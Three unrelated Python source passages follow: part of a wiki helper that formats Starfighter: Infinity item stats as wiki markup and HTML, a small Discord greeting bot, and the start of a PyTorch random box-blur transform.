return rtnVal
def ItemDisplayStatImageHtml(item, p=...):
rtnVal = ''
wikiImage = GetItemWikiImage(item)
if wikiImage:
iconUrl = GetItemImageUrl(item)
if iconUrl:
rtnVal = '<img src="{}" width="55" height="55" onError="this.onerror = \'\';this.style.visibility=\'hidden\';">'.format(iconUrl)
return rtnVal
def ItemDisplayStatAmmo(item, p=...):
rtnVal = ""
if GeneralUtils.floatCmp(item['ammoOrEnergyUsage'], '>', 0) and not item['energyBased']:
rtnVal = GeneralUtils.NumDisplay(item['ammoOrEnergyUsage'], 0)
if item['weaponType'] != 5:
rtnVal = "{} ({})".format(GeneralUtils.NumDisplay(item['ammoOrEnergyUsage'], 0), GeneralUtils.NumDisplay(item['ammoOrEnergyUsage'] * 5, 0))
return rtnVal
def ItemDisplayStatAmmoReserve(item, p=...):
rtnVal = ""
if GeneralUtils.floatCmp(item['ammoOrEnergyUsage'], '>', 0) and not item['energyBased'] and item['weaponType'] != 5:
rtnVal = GeneralUtils.NumDisplay(item['ammoOrEnergyUsage'] * 5, 0)
return rtnVal
def ItemDisplayStatEffect(item, p=...):
rtnVal = ""
try:
if item['effect'] >= 0:
if item['type'] == 5:
rtnVal = GetShieldEffectName(item, True)
else:
rtnVal = SmallConstants.effectsData[item['effect']]['name']
if item['effectTime'] > 0:
rtnVal = "{} ({}s)".format(rtnVal, GeneralUtils.NumDisplay(item['effectTime'], 0))
except:
pass
if rtnVal == "" and item['name'].lower().find('chain laser') >= 0:
rtnVal = GetItemDescription(item)
return rtnVal
def ItemDisplayStatEffectHtml(item, p=...):
rtnVal = ""
try:
if item['effect'] >= 0:
if item['type'] == 5:
rtnVal = GetShieldEffectName(item, True)
else:
rtnVal = SmallConstants.effectsData[item['effect']]['name']
if item['effectTime'] > 0:
rtnVal = "{} ({}s)".format(rtnVal, GeneralUtils.NumDisplay(item['effectTime'], 0))
except:
pass
if rtnVal == "" and item['name'].lower().find('chain laser') >= 0:
useHtmlForLinks = True
rtnVal = GetItemDescription(item, useHtmlForLinks)
return rtnVal
def ItemDisplayStatSkill(item, p=...):
rtnVal = ""
if item['skillRequirement']['skill'] >= 0:
rtnVal = "N/A"
if item['skillRequirement']['level'] > 0:
rtnVal = "{} {}".format(
ShortenSkillName(SmallConstants.skillsData[item['skillRequirement']['skill']]['name']),
item['skillRequirement']['level']
)
return rtnVal
def ItemDisplayStatSkillFull(item, p=...):
rtnVal = ""
if item['skillRequirement']['level'] > 0:
rtnVal = "{} {}".format(
SmallConstants.skillsData[item['skillRequirement']['skill']]['name'],
item['skillRequirement']['level']
)
return rtnVal
def ItemDisplayStatName(item, p=...):
displayName = item['name']
itemArticlePage = GetItemWikiArticlePage(item)
if itemArticlePage:
if WikiUtils.PageNamesEqual(itemArticlePage, item['name']):
displayName = '[[{}]]'.format(item['name'])
else:
displayName = '[[{}|{}]]'.format(itemArticlePage, item['name'])
rtnVal = displayName
sourceClass = GetItemSourceClassName(item)
if sourceClass:
rtnVal = ' class="{}" | {}'.format(sourceClass, displayName)
return rtnVal
def ItemDisplayStatNameHtml(item, p=...):
displayName = html.escape(item['name'])
itemArticlePage = GetItemWikiArticlePage(item)
if itemArticlePage:
displayName = '<a href="{}">{}</a>'.format(
WikiUtils.GetWikiLink(itemArticlePage),
displayName
)
rtnVal = displayName
sourceClass = GetItemSourceClassName(item)
if sourceClass:
rtnVal = '<span class="{}">{}</span>'.format(sourceClass, displayName)
return rtnVal
def ItemDisplayStatNameAndImage(item, p=...):
rtnVal = ""
imageName = GetItemWikiImage(item)
pageName = GetItemWikiArticlePage(item)
if not pageName: pageName = SplitNameIntoBaseNameAndItemLevel(item['name'])['fullNameMinusLevel']
itemName = item['name']
sourceClass = GetItemSourceClassName(item)
sourceClass = sourceClass if sourceClass is not None else ""
if imageName:
rtnVal = 'align="center" style="font-size: smaller;" class="{}" | [[File:{}|centre|thumb|60x60px|link={}]]<br/>[[{}{}]]'.format(sourceClass, imageName, pageName, '' if WikiUtils.PageNamesEqual(pageName, itemName) else '{}|'.format(pageName), itemName)
else:
rtnVal = 'align="center" style="font-size: smaller;" class="{}" | [[{}{}]]'.format(sourceClass, '' if WikiUtils.PageNamesEqual(pageName, itemName) else '{}|'.format(pageName), itemName)
# iconHtml = GetShieldEffectIconsForItem(item)
# if iconHtml:
# rtnVal = "{}<br />{}".format(rtnVal, iconHtml)
return rtnVal
def ItemDisplayStatNameAndImageHtml(item, p=...):
rtnVal = ""
pageName = GetItemWikiArticlePage(item)
if not pageName: pageName = SplitNameIntoBaseNameAndItemLevel(item['name'])['fullNameMinusLevel']
wikiUrl = WikiUtils.GetWikiLink(pageName)
imageName = GetItemWikiImage(item)
itemName = item['name']
sourceClass = GetItemSourceClassName(item)
sourceClass = sourceClass if sourceClass is not None else ""
if imageName:
iconUrl = GetItemImageUrl(item)
rtnVal = '<div style="text-align:center; font-size:smaller;" class="{}"><a href="{}"><img src="{}" width="60" height="60" onError="this.onerror = \'\';this.style.visibility=\'hidden\';"><br />{}</a></div>'.format(sourceClass, wikiUrl, iconUrl, itemName)
else:
rtnVal = '<div style="text-align:center; font-size:smaller;" class="{}"><a href="{}">{}</a></div>'.format(sourceClass, wikiUrl, itemName)
return rtnVal
def ItemDisplayStatDamageType(item, p=...):
dtype = GetItemDamageType(item)
return dtype if dtype else ''
def ItemDisplayStatEffectIcons(item, p=...):
rtnVal = GetShieldEffectIconsForItem(item, "positive")
if rtnVal:
rtnVal += "<br>"
rtnVal += GetShieldEffectIconsForItem(item, "negative")
return rtnVal
def ItemDisplayStatPurchaseCost(item, p=...):
source = GetItemSource(item)
rtnVal = "N/A ({})".format(source)
if 'Purchase' in source:
rtnVal = GeneralUtils.NumDisplay(GetItemPurchasePrice(item), 0, True)
return rtnVal
def ItemDisplayStatBPLocation(item, p=...):
loc = GetItemBPLocation(item)
loc = GeneralUtils.AddWikiLinksToText(loc, False, False, { 'Stars': False })
return loc
def ItemDisplayStatBPLocationHtml(item, p=...):
loc = GetItemBPLocation(item)
loc = GeneralUtils.AddHtmlLinksToText(loc, True, False, { 'Stars': False })
return loc
def ItemDisplayStatSpeed(item, p=...):
maxSpd = GetItemMaxSpeed(item)
initSpd = GetItemInitialSpeed(item)
rtnVal = ''
if maxSpd and initSpd and maxSpd != initSpd:
rtnVal = "{} → {}".format(GeneralUtils.NumDisplay(initSpd, 1), GeneralUtils.NumDisplay(maxSpd, 1))
elif maxSpd:
rtnVal = "{}su/s".format(GeneralUtils.NumDisplay(maxSpd, 1))
return rtnVal
def ItemDisplayStatObtain(item, p=...):
source = GetItemSource(item)
sourceClass = GetItemSourceClassName(item)
rtnVal = source
if sourceClass:
rtnVal = ' class="{}" | {}'.format(sourceClass, source)
return rtnVal
def ItemDisplayStatObtainHtml(item, p=...):
source = GetItemSource(item)
sourceClass = GetItemSourceClassName(item)
rtnVal = source
if sourceClass:
rtnVal = '<span class="{}">{}</span>'.format(sourceClass, source)
return rtnVal
def ItemDisplayStatDestination(item, p=...):
rtnVal = ""
if 'micro gate' in item['name'].lower() and 'local' not in item['name'].lower():
prefix = item['name'].split(' ')[-1]
systemName = GalaxyUtils.GetSystemNameByPrefix(prefix)
rtnVal = systemName
wikiPageName = WikiUtils.GetWikiArticlePageForNameList([ systemName ])
if wikiPageName:
if wikiPageName == systemName:
rtnVal = '[[{}]]'.format(systemName)
else:
rtnVal = '[[{}|{}]]'.format(wikiPageName, systemName)
return rtnVal
def ItemDisplayStatDestinationHtml(item, p=...):
rtnVal = ""
if 'micro gate' in item['name'].lower() and 'local' not in item['name'].lower():
prefix = item['name'].split(' ')[-1]
systemName = GalaxyUtils.GetSystemNameByPrefix(prefix)
rtnVal = systemName
wikiPageName = WikiUtils.GetWikiArticlePageForNameList([ systemName ])
if wikiPageName:
rtnVal = '<a href="{}" title="{} Star System">{}</a>'.format(
WikiUtils.GetWikiLink(wikiPageName),
systemName,
systemName
)
return rtnVal
def ItemDisplayStatItemType(item, p=...):
itemType = GetItemType(item)
displayItemType = itemType
if p == "itemPage":
if displayItemType == "Standard":
displayItemType = "Standard Secondary Weapon"
elif displayItemType == "Proximity" or displayItemType == "Large":
displayItemType = "{} Weapon".format(displayItemType)
wikiPageName = GetWikiPageForItemType(itemType)
if wikiPageName:
if wikiPageName == itemType:
return '[[{}]]'.format(displayItemType)
return '[[{}|{}]]'.format(wikiPageName, displayItemType)
return itemType
def ItemDisplayStatItemTypeHtml(item, p=...):
itemType = GetItemType(item)
wikiPageName = GetWikiPageForItemType(itemType)
if wikiPageName:
return '<a href="{}" title="Equipment - {}">{}</a>'.format(
WikiUtils.GetWikiLink(wikiPageName),
itemType,
itemType
)
return itemType
def ItemDisplayStatArmTime(item, p=...):
rtnVal = ""
lt = GetItemLife(item)
if item['weaponType'] == 5 and lt is not None and lt > 0:
rtnVal = "{}s".format(GeneralUtils.NumDisplay(lt, 2))
if not rtnVal and item['armingTime'] > 0:
rtnVal = "{}s".format(GeneralUtils.NumDisplay(item['armingTime'], 2))
return rtnVal
def ItemDisplayStatAcceleration(item, p=...):
rtnVal = ""
if GetItemType(item) == 'Engine':
return "x{}".format(GeneralUtils.NumDisplay(item['accelMod'], 4)) if item['accelMod'] > 0 else ""
return "{}su/s/s".format(GeneralUtils.NumDisplay(item['acceleration'], 2))
### Generic stat display
def ItemDisplayStatGeneric(item, p=...):
try:
return item[p]
except:
print("{} not found".format(p))
return ""
itemDisplayStatSwitcher = {
'acceleration': ItemDisplayStatAcceleration,
'accel': ItemDisplayStatAcceleration,
'ac': (lambda obj, p: GeneralUtils.NumDisplay(obj['accuracy'], 2)),
'acc': (lambda obj, p: GeneralUtils.NumDisplay(obj['accuracy'], 2)),
'accuracy': (lambda obj, p: GeneralUtils.NumDisplay(obj['accuracy'], 2)),
'acquisition': ItemDisplayStatObtain,
'am': ItemDisplayStatAmmo,
'ammo cost': (lambda obj, p: GeneralUtils.NumDisplay(GetItemAmmoCost(obj), 0, True) if GetItemAmmoCost(obj) > 0 else ""),
'ammo': ItemDisplayStatAmmo,
'amount': (lambda obj, p: obj['amount'] if obj['amount'] > 0 else ""),
'amt': (lambda obj, p: GetNumOfDamagingProjectiles(obj, True)),
'ar': ItemDisplayStatAmmoReserve,
'arming time': ItemDisplayStatArmTime,
'arm': ItemDisplayStatArmTime,
'aug type': (lambda obj, p: GetItemAugType(obj)),
'autopilot': (lambda obj, p: "+{}".format(GeneralUtils.NumDisplay(obj['autoPilotSpeedInc'], 4)) if obj['autoPilotSpeedInc'] > 0 else ""),
'base dpe': ItemDisplayStatDpe,
'base dps': ItemDisplayStatDps,
'bdpe': ItemDisplayStatDpe,
'bdps': ItemDisplayStatDps,
'bp location': ItemDisplayStatBPLocation,
'charge delay': (lambda obj, p: "{}s".format(GeneralUtils.NumDisplay(obj['chargeDelay'], 4)) if obj['chargeDelay'] > 0 else ""),
'charge rate': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['chargeModifier'], 4)) if obj['chargeModifier'] > 0 else ""),
'cost': ItemDisplayStatPurchaseCost,
'damage': ItemDisplayStatDamage,
'destination': ItemDisplayStatDestination,
'dmg': ItemDisplayStatDamage,
'dmg type': ItemDisplayStatDamageType,
'dpe': ItemDisplayStatTotalDpe,
'dph': ItemDisplayStatDamage,
'dps': ItemDisplayStatTotalDps,
'effect': ItemDisplayStatEffect,
'effect icons': ItemDisplayStatEffectIcons,
'effects': ItemDisplayStatEffect,
'energy': ItemDisplayStatEnergyRequired,
'energy usage': ItemDisplayStatEnergyRequired,
'engine name': ItemDisplayStatName,
'et': (lambda obj, p: "{}s".format(GeneralUtils.NumDisplay(obj['effectTime'], 0)) if obj['effectTime'] > 0 else ""),
'eu': ItemDisplayStatEnergyRequired,
'fire rate': ItemDisplayStatRateOfFire,
'image': ItemDisplayStatImage,
'img': ItemDisplayStatImage,
'init spd': (lambda obj, p: GeneralUtils.NumDisplay(GetItemInitialSpeed(obj), 1) if GetItemInitialSpeed(obj) else ""),
'init speed': (lambda obj, p: GeneralUtils.NumDisplay(GetItemInitialSpeed(obj), 1) if GetItemInitialSpeed(obj) else ""),
'is': (lambda obj, p: GeneralUtils.NumDisplay(GetItemInitialSpeed(obj), 1) if GetItemInitialSpeed(obj) else ""),
'item': ItemDisplayStatNameAndImage,
'is passive': (lambda obj, p: 'Yes' if 'passive' in obj and obj['passive'] else 'No'),
'lifetime': (lambda obj, p: "{}s".format(GeneralUtils.NumDisplay(GetItemLife(obj)), 1) if GetItemLife(obj) else ""),
'lifetime (s)': (lambda obj, p: GeneralUtils.NumDisplay(GetItemLife(obj), 1) if GetItemLife(obj) > 0 else ""),
'lrng': (lambda obj, p: "{}su".format(GeneralUtils.NumDisplay(GetItemRange(obj), 1)) if obj['guidance'] == 1 or IsBeamWeapon(obj) or 'Smart' in obj['name'] else ''),
'lt': (lambda obj, p: "{}s".format(GeneralUtils.NumDisplay(GetItemLife(obj), 1)) if GetItemLife(obj) > 0 else ""),
'max spd': (lambda obj, p: GeneralUtils.NumDisplay(GetItemMaxSpeed(obj), 1) if GetItemMaxSpeed(obj) else ""),
'max speed': (lambda obj, p: GeneralUtils.NumDisplay(GetItemMaxSpeed(obj), 1) if GetItemMaxSpeed(obj) else ""),
'maximum charge multiplier': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['maxModifier'], 4)) if obj['maxModifier'] > 0 else ""),
'maximum charge mult': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['maxModifier'], 4)) if obj['maxModifier'] > 0 else ""),
'min rng': (lambda obj, p: "{}su".format(GeneralUtils.NumDisplay(GetItemMinRange(obj), 1)) if GetItemMinRange(obj) else ''),
'mrng': (lambda obj, p: "{}su".format(GeneralUtils.NumDisplay(GetItemMinRange(obj), 1)) if GetItemMinRange(obj) else ''),
'ms': (lambda obj, p: GeneralUtils.NumDisplay(GetItemMaxSpeed(obj), 1) if GetItemMaxSpeed(obj) else ""),
'name': ItemDisplayStatName,
'notes': (lambda obj, p: GetItemDescription(obj)),
'obtained': ItemDisplayStatObtain,
'obtaining': ItemDisplayStatObtain,
'obtain': ItemDisplayStatObtain,
'pd': (lambda obj, p: "{} sec".format(GeneralUtils.NumDisplay(obj['propulsionEnhanceTime'], 4)) if obj['propulsionEnhanceTime'] > 0 else ""),
'price unmodified': (lambda obj, p: GeneralUtils.NumDisplay(obj['price'], 0, True)),
'prop': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['propulsionEnhance'], 4)) if obj['propulsionEnhance'] > 0 else ""),
'prop time': (lambda obj, p: "{} sec".format(GeneralUtils.NumDisplay(obj['propulsionEnhanceTime'], 4)) if obj['propulsionEnhanceTime'] > 0 else ""),
'propulsion': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['propulsionEnhance'], 4)) if obj['propulsionEnhance'] > 0 else ""),
'purchase cost': ItemDisplayStatPurchaseCost,
'race': (lambda obj, p: GetRaceForItem(obj)),
'range': (lambda obj, p: "{}su".format(GeneralUtils.NumDisplay(GetItemRange(obj), 1)) if GetItemRange(obj) else ''),
'rebuy cost': (lambda obj, p: GeneralUtils.NumDisplay(GetItemAmmoCost(obj), 0, True) if GetItemAmmoCost(obj) > 0 else ""),
'required_skill': ItemDisplayStatSkillFull,
'reverse': (lambda obj, p: "{}%".format(GeneralUtils.NumDisplay(obj['reverseSpeedMod'] * 100, 1)) if obj['reverseSpeedMod'] > 0 else ""),
'rng': (lambda obj, p: GeneralUtils.NumDisplay(GetItemRange(obj), 1) if GetItemRange(obj) else ''),
'rate of fire': ItemDisplayStatRateOfFire,
'rof': ItemDisplayStatRateOfFireShort,
'secondary effects': (lambda obj, p: GetItemDescription(obj)),
'sk': ItemDisplayStatSkill,
'skill': ItemDisplayStatSkill,
'spd': ItemDisplayStatSpeed,
'speed': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['maxSpeedMod'], 4)) if obj['maxSpeedMod'] > 0 else ""),
'td': ItemDisplayStatTotalDamagePerVolley,
'tdpe': ItemDisplayStatTotalDpe,
'tdpv': ItemDisplayStatTotalDamagePerVolley,
'tdps': ItemDisplayStatTotalDps,
'total dmg': ItemDisplayStatTotalDamagePerVolley,
'total ammo': ItemDisplayStatAmmo,
'trn': (lambda obj, p: "{}°".format(GeneralUtils.NumDisplay(obj['turning'] * Config.turnMultiplier, 2)) if obj['turning'] > 0 else ""),
'turning': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['turningMod'], 4)) if obj['turningMod'] > 0 else ""),
'trn': (lambda obj, p: "{}°".format(GeneralUtils.NumDisplay(obj['turning'] * Config.turnMultiplier, 1)) if obj['turning'] > 0 else ""),
'turn': (lambda obj, p: "{}°".format(GeneralUtils.NumDisplay(obj['turning'] * Config.turnMultiplier, 2)) if obj['turning'] > 0 else ""),
'type': ItemDisplayStatItemType,
'velocity': ItemDisplayStatSpeed,
'volley': (lambda obj, p: obj['amount'] if obj['amount'] > 0 else ""),
'weapon_type': ItemDisplayStatItemType,
}
itemDisplayStatSwitcherHtml = itemDisplayStatSwitcher.copy()
itemDisplayStatSwitcherHtml['engine name'] = ItemDisplayStatNameHtml
itemDisplayStatSwitcherHtml['name'] = ItemDisplayStatNameHtml
itemDisplayStatSwitcherHtml['img'] = ItemDisplayStatImageHtml
itemDisplayStatSwitcherHtml['image'] = ItemDisplayStatImageHtml
itemDisplayStatSwitcherHtml['obtain'] = ItemDisplayStatObtainHtml
itemDisplayStatSwitcherHtml['obtaining'] = ItemDisplayStatObtainHtml
itemDisplayStatSwitcherHtml['obtained'] = ItemDisplayStatObtainHtml
itemDisplayStatSwitcherHtml['acquisition'] = ItemDisplayStatObtainHtml
itemDisplayStatSwitcherHtml['destination'] = ItemDisplayStatDestinationHtml
itemDisplayStatSwitcherHtml['type'] = ItemDisplayStatItemTypeHtml
itemDisplayStatSwitcherHtml['item'] = ItemDisplayStatNameAndImageHtml
itemDisplayStatSwitcherHtml['effect'] = ItemDisplayStatEffectHtml
itemDisplayStatSwitcherHtml['effects'] = ItemDisplayStatEffectHtml
itemDisplayStatSwitcherHtml['bp location'] = ItemDisplayStatBPLocationHtml
itemDisplayStatSwitcherHtml['notes'] = (lambda obj, p: GetItemDescription(obj, useHtmlForLinks=True))
itemDisplayStatSwitcherHtml['secondary effects'] = (lambda obj, p: GetItemDescription(obj, useHtmlForLinks=True))
def GetStatDisplayForObject(propName, obj):
rtnVal = ""
try:
# print(propName)
func = itemDisplayStatSwitcher.get(propName.lower(), ItemDisplayStatGeneric)
rtnVal = func(obj, propName)
except:
pass
return rtnVal
def GetHtmlStatDisplayForObject(propName, obj):
rtnVal = ""
try:
func = itemDisplayStatSwitcherHtml.get(propName.lower(), ItemDisplayStatGeneric)
rtnVal = func(obj, propName)
except:
pass
return rtnVal
# Get relevant stat descriptions
itemStatDescriptionSwitcher = {
'acceleration': (lambda s, pt: "Engine acceleration modifier. The higher acceleration a ship has the quicker it gets up to max speed (100 accel = 1 second to max)"),
'accel': (lambda s, pt: "Engine acceleration modifier. The higher acceleration a ship has the quicker it gets up to max speed (100 accel = 1 second to max)"),
'ac': (lambda s, pt: "Accuracy or spread measured in degrees"),
'acc': (lambda s, pt: "Accuracy or spread measured in degrees"),
'accuracy': (lambda s, pt: "Accuracy or spread measured in degrees"),
'acquisition': (lambda s, pt: "How you can obtain the item"),
'am': (lambda s, pt: "Ammo per clip (Reserve ammo)"),
'ammo cost': (lambda s, pt: "Ammo cost per magazine"),
'ammo': (lambda s, pt: "Ammo per clip (Reserve ammo)"),
'amount': (lambda s, pt: "Number of projectiles fired per volley"),
'amt': (lambda s, pt: "Number of projectiles fired per volley"),
'ar': (lambda s, pt: "Reserve Ammo"),
'arming time': (lambda s, pt: "The delay in seconds before the item activates and is able to hit a target"),
'arm': (lambda s, pt: "The delay in seconds before the item activates and is able to hit a target"),
'aug type': (lambda s, pt: "The type of augmentation"),
'autopilot': (lambda s, pt: "Additional speed applied when using auto-pilot. Typically this is a flat rate added to max speed measured in su/s"),
'base dpe': (lambda s, pt: "Damage per energy spent only counting the base weapon damage (no effect damage)"),
'base dps': (lambda s, pt: "Damage per second only counting the base weapon damage (no effect damage)"),
'bdpe': (lambda s, pt: "Damage per energy spent only counting the base weapon damage (no effect damage)"),
'bdps': (lambda s, pt: "Damage per second only counting the base weapon damage (no effect damage)"),
'bp location': (lambda s, pt: "Location of the station where you can hack or dock to get this blueprint"),
'charge delay': (lambda s, pt: "How long it takes a ship to start recharging its shields"),
'charge rate': (lambda s, pt: "How fast a ship can recharge its shields"),
'cost': (lambda s, pt: "The item cost when purchasing from the store"),
'damage': (lambda s, pt: "Base damage per projectile hit"),
'destination': (lambda s, pt: "The system/location where a Micro Gate will take you"),
'dmg': (lambda s, pt: "Base damage per projectile hit"),
'dmg type': (lambda s, pt: "Type of direct damage done by the item"),
'dpe': (lambda s, pt: "Damage per energy spent, including effect damage"),
'dph': (lambda s, pt: "Base damage per projectile hit"),
'dps': (lambda s, pt: "Damage per second, including effect damage"),
'effect': (lambda s, pt: "Status effect applied"),
# 'effect icons': (lambda s, pt: ""),
'effects': (lambda s, pt: "Status effect applied"),
'energy': (lambda s, pt: "Energy used per shot"),
'energy usage': (lambda s, pt: "Energy used per shot"),
# 'engine name': (lambda s, pt: ""),
'et': (lambda s, pt: "Effect Time"),
'eu': (lambda s, pt: "Energy used per shot"),
'fire rate': (lambda s, pt: "Rate of fire"),
# 'image': (lambda s, pt: ""),
'img': (lambda s, pt: "Item image"),
'init spd': (lambda s, pt: "Projectile initial speed measured in su/s"),
'init speed': (lambda s, pt: "Projectile initial speed measured in su/s"),
'is': (lambda s, pt: "Projectile initial speed measured in su/s"),
# 'item': (lambda s, pt: ""),
'is passive': (lambda s, pt: "Whether or not this augmentation is passive"),
'lifetime': (lambda s, pt: "Lifetime measured in seconds"),
'lifetime (s)': (lambda s, pt: "Lifetime measured in seconds"),
'lrng': (lambda s, pt: "Locking range"),
'lt': (lambda s, pt: "Lifetime measured in seconds"),
'max spd': (lambda s, pt: "Projectile max speed measured in su/s"),
'max speed': (lambda s, pt: "Projectile max speed measured in su/s"),
'maximum charge multiplier': (lambda s, pt: "The multiplier for a ship's maximum shielding"),
'maximum charge mult': (lambda s, pt: "The multiplier for a ship's maximum shielding"),
'min rng': (lambda s, pt: "Minimum range measured in su. Before this range is reached the projectile is not yet active and will bounce off targets"),
'mrng': (lambda s, pt: "Minimum range measured in su. Before this range is reached the projectile is not yet active and will bounce off targets"),
'ms': (lambda s, pt: "Projectile max speed measured in su/s"),
# 'name': (lambda s, pt: ""),
# 'notes': (lambda s, pt: ""),
'obtained': (lambda s, pt: "How you can obtain the item"),
'obtaining': (lambda s, pt: "How you can obtain the item"),
'obtain': (lambda s, pt: "How you can obtain the item"),
'pd': (lambda s, pt: "The time in seconds the engine will continue to boost. While the boost is active the ship cannot decelerate"),
'price unmodified': (lambda s, pt: "Raw price of the item, without being adjusted for buying or selling"),
'prop': (lambda s, pt: "Engine propulsion speed modifier. Applied to the max speed, this is how fast your ship will go when boosting"),
'prop time': (lambda s, pt: "The time in seconds the engine will continue to boost. While the boost is active the ship cannot decelerate"),
'propulsion': (lambda s, pt: "Engine propulsion speed modifier. Applied to the max speed, this is how fast your ship will go when boosting"),
# 'purchase cost': (lambda s, pt: ""),
'race': (lambda s, pt: "The race which owns the item. In the case of NPR races this will be who you need to farm for the drop"),
'range': (lambda s, pt: "Range of the weapon measured in su"),
'rebuy cost': (lambda s, pt: "Ammo cost (each)"),
'required_skill': (lambda s, pt: "The required skill to purchase or craft the item"),
'reverse': (lambda s, pt: "The max speed the ship can reach while reversing, as a percentage of the max speed"),
'rng': (lambda s, pt: "Range of the weapon measured in su"),
# 'rate of fire': (lambda s, pt: ""),
'rof': (lambda s, pt: "Rate of fire"),
# 'secondary effects': (lambda s, pt: ""),
'sk': (lambda s, pt: "The required skill to purchase or craft the item"),
'skill': (lambda s, pt: "The required skill to purchase or craft the item"),
'spd': (lambda s, pt: "Projectile speed measured in su/s. May include initial speed"),
'speed': (lambda s, pt: "Engine max speed multiplier"),
'td': (lambda s, pt: "Total damage per volley, including effect damage"),
'tdpe': (lambda s, pt: "Total damage per energy spent, including effect damage"),
'tdpv': (lambda s, pt: "Total damage per volley, including effect damage"),
'tdps': (lambda s, pt: "Total damage per second, including effect damage"),
'total dmg': (lambda s, pt: "Total damage per volley, including effect damage"),
'total ammo': (lambda s, pt: "Ammo per clip (Reserve ammo)"),
'trn': (lambda s, pt: "Turning rate - rate at which the projectile rotates measured in degrees per second"),
'turning': (lambda s, pt: "Turn rate modifier - the higher a ship's turn rate the more agile it is"),
'trn': (lambda s, pt: "Turning rate - rate at which the projectile rotates measured in degrees per second"),
'turn': (lambda s, pt: "Turning rate - rate at which the projectile rotates measured in degrees per second"),
'type': (lambda s, pt: "The type of item this is (Mineral, Primary Weapon, Collectible, etc)"),
'velocity': (lambda s, pt: "Projectile speed measured in su/s. May include initial speed"),
'volley': (lambda s, pt: "Number of projectiles fired per volley"),
'weapon_type': (lambda s, pt: "The type of weapon this is (primary, utility, large, etc)"),
}
def GetDescriptionForItemStatName(statName, pageType):
rtnVal = ""
try:
func = itemStatDescriptionSwitcher.get(statName.lower(), (lambda s, pt: ""))
rtnVal = func(statName, pageType)
if rtnVal and pageType == 'crafting':
rtnVal = rtnVal.replace('to purchase or craft the item', 'to craft the item')
except:
pass
return rtnVal
# Begin Sorting Functions
def SortByNameAndRangeId(item):
nameInfo = SplitNameIntoBaseNameAndItemLevel(item['name'])
rtnVal = nameInfo['fullNameMinusLevel']
if nameInfo['levelIdx'] is not None:
rtnVal = "{}-{}".format(rtnVal, nameInfo['levelIdx'])
return rtnVal
def GetItemSortFunc(sortBy="Default"):
try:
if sortBy.lower() == "name":
return lambda v : v['name'].lower()
if sortBy.lower() == "race":
return lambda v : "{:03d}-{}".format(v['race'], v['name'].lower())
if sortBy.lower() == 'skilllevel':
return lambda v: "{:03d}-{}-{}".format(GetItemSkillLevel(v), GetItemSkillName(v), v['name'].lower())
except:
pass
return SortByNameAndRangeId
# Begin Data Initialization Functions
def PrepareItemDataPrimaryList():
global itemDataDict, itemData, itemBaseNameList
itemDataDict = {}
# itemDataPublic is updated quite regularly, at least as often as the game is patched
# It is incomplete however. No NPR items are included, and no equivalent of the range and crafting data
for item in itemDataPublic:
item['__dataSource'] = 'public'
itemDataDict[item['id']] = item
nameParts = SplitNameIntoBaseNameAndItemLevel(item['name'])
nameLower = nameParts['fullNameMinusLevel'].lower().replace('_', ' ')
if not nameLower in itemBaseNameList:
itemBaseNameList.append(nameLower)
# itemDataPrivate is updated often, often updated when the game is patched
for item in itemDataPrivate.values():
if item['id'] not in itemDataDict:
item['__dataSource'] = 'private'
# Fix for a bug. This should only be needed short term until the data is updated next.
if item['name'] == 'Devimon Fire Blast' and item['race'] == 8:
item['__bugfixActive'] = True
item['race'] = 25
itemDataDict[item['id']] = item
nameParts = SplitNameIntoBaseNameAndItemLevel(item['name'])
nameLower = nameParts['fullNameMinusLevel'].lower().replace('_', ' ')
if not nameLower in itemBaseNameList:
itemBaseNameList.append(nameLower)
# Generate the item data list from the data dictionary
itemData = [ v for k,v in itemDataDict.items() ]
def Initialize():
global itemIdListToSkip, beamWeaponOverrideIdList, rarePlayerRaceDropIdList
LoadItemInformation()
PrepareItemDataPrimaryList()
beamWeaponOverrideIdList = [ GetItemByName(n)['id'] for n in beamWeaponOverrideList ]
rarePlayerRaceDropIdList = [ GetItemByName(n)['id'] for n in rarePlayerRaceDropList ]
for item in itemData:
if GetItemBPLocation(item) == 'N/A':
itemIdListToSkip.append(item['id'])
continue
if 'equipCategory' in item and item['equipCategory'] == 7:
itemIdListToSkip.append(item['id'])
continue
for skipItem in itemsToSkip:
if item['name'].lower() == skipItem.lower():
itemIdListToSkip.append(item['id'])
# for race in SmallConstants.raceData:
# itemIdListToSkip += race['omitFromLoot']
# itemIdListToSkip += race['dontUse']
def LoadItemInformation():
global itemDataPrivate, itemDataPublic, itemRangeData, itemVariantData, itemCraftableData
# Load item data provided publicly on the Starfighter: Infinity website
itemDataPublic = DataLoader.LoadItemDataFromPublicStarfighterWebsite()
# Load item data provided by Ben Olding
itemDataPrivate = DataLoader.LoadWeaponDataFromBenOldingWebsite()
itemRangeData = DataLoader.LoadWeaponRangesDataFromBenOldingWebsite()
itemVariantData = DataLoader.LoadWeaponVariantDataFromBenOldingWebsite()
itemCraftableData = DataLoader.LoadWeaponCraftableDataFromBenOldingWebsite()
return True
Initialize()
|
# bot.py
import os
import ast
import discord
from dotenv import load_dotenv
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
client = discord.Client()
@client.event
async def on_ready():
print(f'{client.user.name} has connected to Discord!')
@client.event
async def on_member_join(member):
await member.create_dm()
await member.dm_channel.send(
f'Hi {member.name}, welcome to my Discord server!'
)
@client.event
async def on_message(message):
if message.author == client.user:
return
incoming = message.content
if incoming.startswith('hey bytie!'):
response = "Yes sir!"
await message.channel.send(response)
if incoming.startswith("$$"):
response = "I didn't yet implement the LaTeX rendering, sir!"
await message.channel.send(response)
if incoming.startswith("ast "):
tree = ast.parse(incoming[4:])
result = ast.dump(tree)
await message.channel.send(result)
client.run(TOKEN)
|
from random import randint
import torch
from ...stability.blur import TFMSBoxBlur
class TFMSRandomBoxBlur(torch.nn.Module):
def __init__(self, min_kernel_size=(11, 11), max_kernel_size=(51, 51), border_type='reflect'):
super(TFMSRandomBoxBlur, self).__init__()
self.min_kernel_size = min_kernel_size
self.max_kernel_size = max_kernel_size
self.border_type = border_type
def forward(self, img):
return TFMSBoxBlur((
randint(self.min_kernel_size[0] // 2,
self.max_kernel_size[0] // 2) * 2 + 1,
